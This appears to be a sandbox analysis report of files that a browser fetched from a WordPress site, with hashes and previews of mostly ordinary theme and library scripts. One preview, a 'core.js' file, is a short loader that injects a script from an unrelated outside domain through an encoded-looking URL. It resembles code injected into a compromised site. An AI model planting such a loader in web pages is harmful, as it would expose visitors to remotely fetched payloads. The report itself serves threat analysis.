                                                                                                                                                                                                                                                                        Preview:!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?exports=n(require("jquery")):n(jQuery)}(function(n){n.easing.jswing=n.easing.swing;var e=Math.pow,t=Math.sqrt,u=Math.sin,r=Math.cos,i=Math.PI,a=1.70158,c=1.525*a,o=2*i/3,s=2*i/4.5;function f(n){var e=7.5625,t=2.75;return n<1/t?e*n*n:n<2/t?e*(n-=1.5/t)*n+.75:n<2.5/t?e*(n-=2.25/t)*n+.9375:e*(n-=2.625/t)*n+.984375}n.extend(n.easing,{def:"easeOutQuad",swing:function(e){return n.easing[n.easing.def](e)},easeInQuad:function(n){return n*n},easeOutQuad:function(n){return 1-(1-n)*(1-n)},easeInOutQuad:function(n){return n<.5?2*n*n:1-e(-2*n+2,2)/2},easeInCubic:function(n){return n*n*n},easeOutCubic:function(n){return 1-e(1-n,3)},easeInOutCubic:function(n){return n<.5?4*n*n*n:1-e(-2*n+2,3)/2},easeInQuart:function(n){return n*n*n*n},easeOutQuart:function(n){return 1-e(1-n,4)},easeInOutQuart:function(n){return n<.5?8*n*n*n*n:1-e(-2*n+2,4)/2},easeInQu
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (333)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1771
                                                                                                                                                                                                                                                                        Entropy (8bit):5.168993818776159
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:0pZwtumzmkpNDK95I7xlURWmvMTKNkcV8eWnNkzeWV5OenF7yOVIey0yFCjceWTG:0Jkp6Yx2wm8Gkc0NkLSen1hI/0olTV4
                                                                                                                                                                                                                                                                        MD5:9C45E33E8783A5C6E0AB313B8285F385
                                                                                                                                                                                                                                                                        SHA1:9C2CAE69E424A5FAAE68BA556050D24FEA37D91F
                                                                                                                                                                                                                                                                        SHA-256:E4FAA755F8ADE9AAC6BDBE925F6CF7DC0164E11B220D556B9FAFED08A525481C
                                                                                                                                                                                                                                                                        SHA-512:88D527CA8B00A67FDD03E469FA7F9600AE959B2CD1EFF6CEE9D53695883332700ABBD8A4988E325A9A455007403FC4531C778DF947F13B41800B44F8DB359EFD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://a.clickcertain.com/px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=US&rid=35b401bb-dd38-4632-8412-1dce28eac56b
                                                                                                                                                                                                                                                                        Preview:<!doctype html>.<html>. <head>. <title></title>. </head>. <body>. <div style="display:none;">. .. </div>. <script>. var tag = document.createElement('img');. tag.setAttribute('src', 'https://a.clickcertain.com/px/r/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935');. tag.setAttribute('height', '1');. tag.setAttribute('width', '1');. tag.setAttribute('alt', '');. tag.setAttribute('style', 'display: none;');. var body = document.getElementsByTagName('body')[0];. body.appendChild(tag);. // false. </script>. . <script type="text/javascript" async defer src="https://a.clickcertain.com/px/ta/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935"></script> -->. <img height='1' width='1' alt='' style='display:none;' src="https://a.clickcertain.com/px/ta/?ccid=355cc50d-f67c-485f-9153-f0a0ddff6935">. <img height='1' width='1' alt='' style='display:none;'
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14452), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):14452
                                                                                                                                                                                                                                                                        Entropy (8bit):5.237903611397791
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:7tlcoVL44z47UUfRlRxpgz+yyDW+cKILke6bxsWnGoOkZeMOubstq/+:747ZBg1yD0N6JnGoOkZK7
                                                                                                                                                                                                                                                                        MD5:632962F383A66FD3D22F3E8F34BCED13
                                                                                                                                                                                                                                                                        SHA1:09F1FA3FADFB7960994ECB183EE1B1C8F679DC7B
                                                                                                                                                                                                                                                                        SHA-256:0BF4B3F691AC2A3F4FFDB1EE657CC5991EEA1BF796361C2C9B8069648A704FF9
                                                                                                                                                                                                                                                                        SHA-512:A58062FD5DE2F4E6DD85DC0F00DE938B1AF29DFECE12461DD8D4EDCC87031E6C88CB801BDE211BD563AB63B6987BA04D296BF95191E0295CE023FFBEB8CF4A9B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):e("undefined"!=typeof jQuery?jQuery:window.Zepto)}(function(L){"use strict";var h={},t=(h.fileapi=void 0!==L("<input type='file'/>").get(0).files,h.formdata=void 0!==window.FormData,!!L.fn.prop);function a(e){var t=e.data;e.isDefaultPrevented()||(e.preventDefault(),L(e.target).ajaxSubmit(t))}function r(e){var t=e.target,a=L(t);if(!a.is("[type=submit],[type=image]")){var r=a.closest("[type=submit]");if(0===r.length)return;t=r[0]}var n=this;"image"==(n.clk=t).type&&(void 0!==e.offsetX?(n.clk_x=e.offsetX,n.clk_y=e.offsetY):"function"==typeof L.fn.offset?(r=a.offset(),n.clk_x=e.pageX-r.left,n.clk_y=e.pageY-r.top):(n.clk_x=e.pageX-t.offsetLeft,n.clk_y=e.pageY-t.offsetTop)),setTimeout(function(){n.clk=n.clk_x=n.clk_y=null},100)}function M(){var e;L.fn.ajaxSubmit.debug&&(e="[jquery.form] "+Array.prototype.join.call(arguments,""),window.console&&window.console.log?window.console.log(e):window.opera&&window.ope
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                                                        Entropy (8bit):5.803904659314035
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:Y2+S5HXnRExYmZ5Hzub8R57AQFwceqEfOEamHQtM0CPc:Y2+muYmZ5TubM71GMEWX3+/c
                                                                                                                                                                                                                                                                        MD5:878E7180C7E12F25F2381B04B51527C2
                                                                                                                                                                                                                                                                        SHA1:4CE4F21B41779639EE774E65B9C2FE1F7A335A07
                                                                                                                                                                                                                                                                        SHA-256:B63D94D9E9F0029CC7721EB8A04455ECD8E00B8B0B0358314ED39083B0E42914
                                                                                                                                                                                                                                                                        SHA-512:559128C26FE1B00AEF24D2E85B960C5806DC574539D0DA71DAD58DD1D0B63449357CB4FFAE87ACB7904054390FBBA58B152C1A5E0CEACBA1630105C857498C7A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:{"features":{"enc_get_req":true},"c":{"type":"hsw","req":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmIjowLCJzIjoyLCJ0IjoidyIsImQiOiJ1Si90TlZOZTd2b1FPT3p0amN1ZE1vWXNMMmUwcHZORDd1dFhLc2EzK2hNbysyd2lad3NHWUgyQk9FOWhGUFVGT0s1VVR6RzFsUFFHT3hnZUlOd2lJNG4yb1FQNzY3azZjUU9SQUR5UklMMXVOUmJxSi9USE03YVNkRTZMdTVmTFBMdUFRTkpCWnl1NmRhcVA3TE14Rjd2NjFDdHFVeSt3cG9pY3ZlQjVRSWRxNHN4NElYVzNwTnJGYWlZQlZvTHdtcnV5TTV2UVJ3MkhuQklSaWZvcWFsRlVROFVqTWJyR3dyT285aXI5dk50UENiSWFEeE9vVnlTaTc5MmEvM1E9dmdRemVjZjNTNWNZZGl0WSIsImwiOiIvYy9mZThiZjVhMTZhOWRiNTA0ZjhhYmEyYWVjM2Y4ZjVlYjJjMDEzYmQ4YTgwZjYyNjhhYmJhZTAzZmU3NjBkNzU0IiwiaSI6InNoYTI1Ni1SbWxVTjgvSTZZR1ZyWjVwTkh2b3FNMDhvOFFXQjFaZW1JM3FlbGMrVUs4PSIsImUiOjE3MzQ3MDA1MjEsIm4iOiJoc3ciLCJjIjoxMDAwfQ.vVrN4lqGrPgiBkHc1bTlofsrdZGfgnei_0k8ekdBDQQ"},"pass":true}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (495), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):495
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9842019229973
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:E2d7Mwuhi2ALBAVAEwR33wePZWBdPZWBzcvpeGX92d7Mws:9Q3inaCNF3wePZCdPZCYv0GXOQD
                                                                                                                                                                                                                                                                        MD5:AAA4BAA259DF27598C811CE1E748D5CF
                                                                                                                                                                                                                                                                        SHA1:FECA05C5AD4CC632F9414039A1CCFF1E9FFF6C1D
                                                                                                                                                                                                                                                                        SHA-256:061BBBFD79681251B90A37FF17B5573ABB1CB658B47B4402A75A98568A34423E
                                                                                                                                                                                                                                                                        SHA-512:82D2BFA6E78C972DEAB582B2ADDC79CD224717850B5E8E68EE4725453632B9A8963D801600263233A299B654B0C7F87B2EDD8DBB4F5A0F2B2F460DFF6B3C8BB1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var avadaTriggerPageTitleFading=function(){void 0===cssua.ua.mobile&&("1"!==avadaFadeVars.page_title_fading&&1!==avadaFadeVars.page_title_fading&&!0!==avadaFadeVars.page_title_fading||("left"===avadaFadeVars.header_position||"right"===avadaFadeVars.header_position?jQuery(".fusion-page-title-wrapper").fusionScroller({type:"opacity",offset:0}):jQuery(".fusion-page-title-wrapper").fusionScroller({type:"opacity",offset:100})))};jQuery(window).on("load",function(){avadaTriggerPageTitleFading()})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1161), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1161
                                                                                                                                                                                                                                                                        Entropy (8bit):5.024506502925189
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:nW1DqE2/kLlqzZhhHFZYEgJ/G3sOYEgJ/G3WZBSHnIYEgJ/G3sMAHlgJ/G3sty:noT2/F1DlZYE8/G3sOYE8/G3WZYHIYEu
                                                                                                                                                                                                                                                                        MD5:D240D862E915D0D2B233B3DAA0F3FF55
                                                                                                                                                                                                                                                                        SHA1:EF71A95FF68AFBAAF39B2FB17A41BB31AD70F049
                                                                                                                                                                                                                                                                        SHA-256:CDD3800A3D91660FECC0241EF69A6DC77C8C33F677AF53D431C91E42BD7FEA51
                                                                                                                                                                                                                                                                        SHA-512:FE7EA5F1CA2EF53CA38C0049E09169EA0CE8E3BA7C57915DD6E24E7FCEA4B45E93D007625DE0A09DC32588E89E7E95A12C9D99BF83997267189EE40812DCBEEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";t.fn.fusionScroller=function(e){var f=t.extend({type:"opacity",offset:0,endOffset:""},e);t(this).each(function(){var e,i,r,o=this;t(window).on("scroll",function(){var s,l,p,c;e=t(o).offset().top,t("body").hasClass("admin-bar")&&(e=t(o).offset().top-t("#wpadminbar").outerHeight()),0<f.offset&&(e=t(o).offset().top-f.offset),i=t(o).outerHeight(),r=e+i,f.endOffset&&t(f.endOffset).length&&(r=t(f.endOffset).offset().top),(s=t(this).scrollTop())>=e&&s<=r&&(l=(r-s)/i*100,"opacity"===f.type?(p=l/100*1,t(o).css({opacity:p})):"blur"===f.type?(c="blur("+(l=100-l)/100*50+"px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c})):"fading_blur"===f.type&&(p=l/100*1,c="blur("+(l=100-l)/100*50+"px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c,opacity:p}))),s<e&&("opacity"===f.type?t(o).css({opacity:1}):"blur"===f.type?(c="blur(0px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2974), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2974
                                                                                                                                                                                                                                                                        Entropy (8bit):5.013524611685299
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Nv2qNPFwKT6grtk7mM7J65wD8wdRO0jUIELdcp5Jp5LC4E79snXMheC:BzPheglM7J1ROJIE56lLNE7KnX0
                                                                                                                                                                                                                                                                        MD5:B49CCDD229B87B0370D3ADD68A5238FB
                                                                                                                                                                                                                                                                        SHA1:2AABB7B066217F5E11896918F25930186B069571
                                                                                                                                                                                                                                                                        SHA-256:C9DA0D53D9CFEA50BDE35EF3DAD69B359B20185BE86E4E4B08F7581CE9D0027A
                                                                                                                                                                                                                                                                        SHA-512:BEC1149A7A645C066D64F4B0C0D1BB8394D05D469ADCC88AB1DE3565037F5223A14F7FA8B14B3465A87E10BDA2D666D8653FDCB564FBEE10C00D7EBD5A827C41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/library/bootstrap.scrollspy.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";function s(e,i){this.processWithBind=t.proxy(this.process,this),this.$body=t("body"),this.$scrollElement=t(e).is("body")?t(window):t(e),this.options=t.extend({},s.DEFAULTS,i),this.selector=(this.options.target||"")+" li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",this.processWithBind),this.refresh(),this.process()}function e(e){return this.each(function(){var i=t(this),o=i.data("bs.scrollspy"),r="object"==typeof e&&e;o||i.data("bs.scrollspy",o=new s(this,r)),"string"==typeof e&&o[e]()})}s.VERSION="3.3.2",s.DEFAULTS={offset:10},s.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},s.prototype.refresh=function(){var s="offset",e=0;fusion.isWindow(this.$scrollElement[0])||(s="position",e=this.$scrollElement.scrollTop()),this.offsets=[],this.targets=[],this.scrollHeight=this.getScr
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (756)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):842
                                                                                                                                                                                                                                                                        Entropy (8bit):5.101801120347226
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:XanJO7hDI8uiiAh68KzRI6V5SLcIOJIdMILk:K0xuiiAM8KzRHecFIMWk
                                                                                                                                                                                                                                                                        MD5:D7853EC36D22154D63D4FD80BF963217
                                                                                                                                                                                                                                                                        SHA1:CC0C648ECAD4071221A2FA91D3D00C239ED29216
                                                                                                                                                                                                                                                                        SHA-256:513F83ADB54573C1BC60808E80BD3D9CD4B00141C0F904D2B2F16F8EA62EE260
                                                                                                                                                                                                                                                                        SHA-512:D29743DB9F438C7213B7B067D875BDD9102C312E16802E939C8B03F2D2E4A742E3C5E3CBC07DCA5C31BA848ABCE53A661E8CFCC1FE1D4F965E1E37A3DBDBABEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */.!function(){if(jQuery&&jQuery.fn&&jQuery.fn.select2&&jQuery.fn.select2.amd)var e=jQuery.fn.select2.amd;e.define("select2/i18n/en",[],function(){return{errorLoading:function(){return"The results could not be loaded."},inputTooLong:function(e){var n=e.input.length-e.maximum,r="Please delete "+n+" character";return 1!=n&&(r+="s"),r},inputTooShort:function(e){return"Please enter "+(e.minimum-e.input.length)+" or more characters"},loadingMore:function(){return"Loading more results."},maximumSelected:function(e){var n="You can only select "+e.maximum+" item";return 1!=e.maximum&&(n+="s"),n},noResults:function(){return"No results found"},searching:function(){return"Searching."},removeAllItems:function(){return"Remove all items"}}}),e.define,e.require}()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4776
                                                                                                                                                                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                                                                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                                                                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                                                                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                                                                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1891), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1891
                                                                                                                                                                                                                                                                        Entropy (8bit):4.97698674208926
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:UPpqVyPmNQswIuTVOfkLQNpoBSrDqlALq79OMvIGFTwi6:UMVy5UXsapoorU9D6
                                                                                                                                                                                                                                                                        MD5:B6775FD782846BEBD764ABE9585B1CA9
                                                                                                                                                                                                                                                                        SHA1:B5E8252FE622934937CCAFD19ECDCA486C4385AD
                                                                                                                                                                                                                                                                        SHA-256:B60FC6EFF3C0B2EC5F6EE4857D149DC353D5E768C319F3E53D613AD2D0E04C06
                                                                                                                                                                                                                                                                        SHA-512:C1DEBE253C5941A10E34B8C5DB12940126729343ADFCC02D2D302814E341B5AE2876ABD8A64BD546072051F9D90756A9854A59D606EA7BA4BEE88F3E899F70A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionSetAnimationData(i){"off"===fusionAnimationsVars.status_css_animations||cssua.ua.mobile&&"desktop_and_mobile"!==fusionAnimationsVars.status_css_animations?jQuery("body").addClass("dont-animate").removeClass("do-animate"):(jQuery("body").addClass("do-animate").removeClass("dont-animate"),void 0!==i&&void 0!==i.data.custom&&jQuery(window).initElementAnimations())}!function(i){"use strict";window.awbAnimationObservers={},i.fn.initElementAnimations=function(){i.each(window.awbAnimationObservers,function(n,t){i.each(t[0],function(i,n){t[1].unobserve(n)}),delete window.awbAnimationObservers[n]}),"IntersectionObserver"in window?i.each(fusion.getObserverSegmentation(i(".fusion-animated")),function(n){var t=fusion.getAnimationIntersectionData(n),e=new IntersectionObserver(function(n,a){i.each(n,function(n,a){var o,s,u,r,d,m=i(a.target),c=0;a.isIntersecting&&(d=!0,0!==t.threshold&&(i(window).height()<m.outerHeight()?i(window).height()/m.outerHeight()>a.intersectionRatio&&(d=!1):1>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):229
                                                                                                                                                                                                                                                                        Entropy (8bit):5.320442008813383
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:2LGT9gO9lfTRWF8tK8+Jdt2RvVTPT46Vau:2STfTRWF8tK8EUVPvVau
                                                                                                                                                                                                                                                                        MD5:B1A549F8FE1C06CE5547AF3ECCAD1325
                                                                                                                                                                                                                                                                        SHA1:1392799DFA05D5C2692CFA4F26DC8BC2655A1761
                                                                                                                                                                                                                                                                        SHA-256:A799D6B5511D28C7963B5F8AA546B31A8A874C01CCA7816D4E0B3888E7492DD3
                                                                                                                                                                                                                                                                        SHA-512:DE89604987CBC79FD6AC8DCAD904EF77169084CCC9832CE98D7E41F82383B4BD8F19CE5F93E4AF86458E76AF02738394BAA789CA3435C6E5AD219AA0DA505DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/enterprise/core.js?ver=1734350104
                                                                                                                                                                                                                                                                        Preview:(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o)})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==')
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (37193)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):37380
                                                                                                                                                                                                                                                                        Entropy (8bit):5.26765700515755
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:wCeGBNOaZ2ZMN7PHDj6KsgabjNu5kq2rSDlbkKJrZ2USwiyFa:xOnaD2KkbjNmB2yQKJrZ2lwiyFa
                                                                                                                                                                                                                                                                        MD5:37C2521EFBE4ED78DA774D284DAD1483
                                                                                                                                                                                                                                                                        SHA1:F67F53F06F5D011B4FC7DBB81F8E5109DED3199D
                                                                                                                                                                                                                                                                        SHA-256:B20765DFF4A5C832A07A5E86D2F46D429BA60024B2C8A0A746D7F5EF5EAAD33C
                                                                                                                                                                                                                                                                        SHA-512:F4A908A9D7CDEE2A445BA07A93E02ADB43D5DF56E3383838000E765BEB58B401348C4D24331E3D6E3277160BD2E7AC339B27CC5076D0E0A9B66FB97DF98FFE12
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*!. * Cropper.js v1.6.1. * https://fengyuanchen.github.io/cropperjs. *. * Copyright 2015-present Chen Fengyuan. * Released under the MIT license. *. * Date: 2023-09-17T03:44:19.860Z. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).Cropper=e()}(this,function(){"use strict";function C(e,t){var i,a=Object.keys(e);return Object.getOwnPropertySymbols&&(i=Object.getOwnPropertySymbols(e),t&&(i=i.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),a.push.apply(a,i)),a}function S(a){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?C(Object(n),!0).forEach(function(t){var e,i;e=a,i=n[t=t],(t=P(t))in e?Object.defineProperty(e,t,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[t]=i}):Object.getOwnPropertyDescriptors?Object.defineProperties(a,Object.getOwnPropertyDescriptors(n)):C(Object(n)).for
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8546
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6197785411836065
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:L9FZ9W52LGIJMA79SL0hF4BTrTQKbho3VZGvToYF4oUBBV8q1gpMTPGMf9e9two8:LbqYLGIyAwFVo3VZg4LoXpMTO8o9aF
                                                                                                                                                                                                                                                                        MD5:F4996938F1D8018E3333A8F8B49044CE
                                                                                                                                                                                                                                                                        SHA1:FB999CBC605F0AA8060CBB3CF8A312E07C062F89
                                                                                                                                                                                                                                                                        SHA-256:A89E0E8AB8DE6667A3B107FFB9269BC63F2999839C22D781199179B8711C604C
                                                                                                                                                                                                                                                                        SHA-512:D0673E409476CFDEDB6A231C1FF21EE486E2B0400E5E61B8A746DD92E9946F3CD79D88E05A44A44041F037FF75494560CB553EA97686007BC1A7B06D60128BE9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/hcaptcha-for-forms-and-more/assets/images/hcaptcha-div-logo.svg
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="44" height="46" viewBox="0 0 44 46" fill="none">. <path opacity="0.5" d="M30 28H26V32H30V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M26 28H22V32H26V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M22 28H18V32H22V28Z" fill="#0074BF"/>. <path opacity="0.5" d="M18 28H14V32H18V28Z" fill="#0074BF"/>. <path opacity="0.7" d="M34 24H30V28H34V24Z" fill="#0082BF"/>. <path opacity="0.8" d="M30 24H26V28H30V24Z" fill="#0082BF"/>. <path d="M26 24H22V28H26V24Z" fill="#0082BF"/>. <path d="M22 24H18V28H22V24Z" fill="#0082BF"/>. <path opacity="0.8" d="M18 24H14V28H18V24Z" fill="#0082BF"/>. <path opacity="0.7" d="M14 24H10V28H14V24Z" fill="#0082BF"/>. <path opacity="0.5" d="M38 20H34V24H38V20Z" fill="#008FBF"/>. <path opacity="0.8" d="M34 20H30V24H34V20Z" fill="#008FBF"/>. <path d="M30 20H26V24H30V20Z" fill="#008FBF"/>. <path d="M26 20H22V24H26V20Z" fill="#008FBF"/>. <path d="M22 20H18V24H22V20Z" fill="#008FBF"/>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 56996, version 1.0
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):56996
                                                                                                                                                                                                                                                                        Entropy (8bit):7.996122603751071
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:768:egNQWneORumUqLxFcEvQyX/eTlFGU5p4y59B2z1LUtjERbDC9Y+KgJb5vC9HpF:eG/tVLxaE1X2TlFGqv9BEAchm5vyr
                                                                                                                                                                                                                                                                        MD5:D5547AEA79A622CB2B4D18C905AB22C2
                                                                                                                                                                                                                                                                        SHA1:3D69FB0712097F39BD7BF057866FCC4448A37008
                                                                                                                                                                                                                                                                        SHA-256:4E0D02C04FE3BB456ED7318A162A6248BD481B6F8E955FECDA064D7C0AD3D792
                                                                                                                                                                                                                                                                        SHA-512:D1D2ABA28121E1270C592E9AC5D21B4307FDDB863DB2352F6CEECE41897417AE806E88AD93BDCD5E4A5B86251B61FE761345C0C3DEB40D2D6F075B1E59693630
                                                                                                                                                                                                                                                                        Malicious:false
